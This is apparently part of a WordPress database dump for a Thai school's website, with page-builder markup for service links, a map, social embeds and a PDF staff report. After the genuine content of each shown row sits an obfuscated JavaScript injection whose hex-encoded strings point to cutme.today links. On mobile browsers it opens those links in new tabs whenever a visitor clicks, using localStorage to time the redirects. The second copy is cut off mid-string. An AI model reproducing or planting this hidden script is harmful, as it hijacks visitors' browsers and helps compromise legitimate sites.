{\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-20 13:03:43','2024-08-20 06:03:43','',14,'http://pakhaeng.ssk.in.th/?p=1002',0,'revision','',0),
(1003,1,'2024-08-20 19:36:56','2024-08-20 12:36:56','<!-- wp:file {\"id\":1088,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล\"></object><a id=\"wp-block-file--media-d4b9de4c-5436-4320-aec8-20d85e2b52aa\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d4b9de4c-5436-4320-aec8-20d85e2b52aa\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\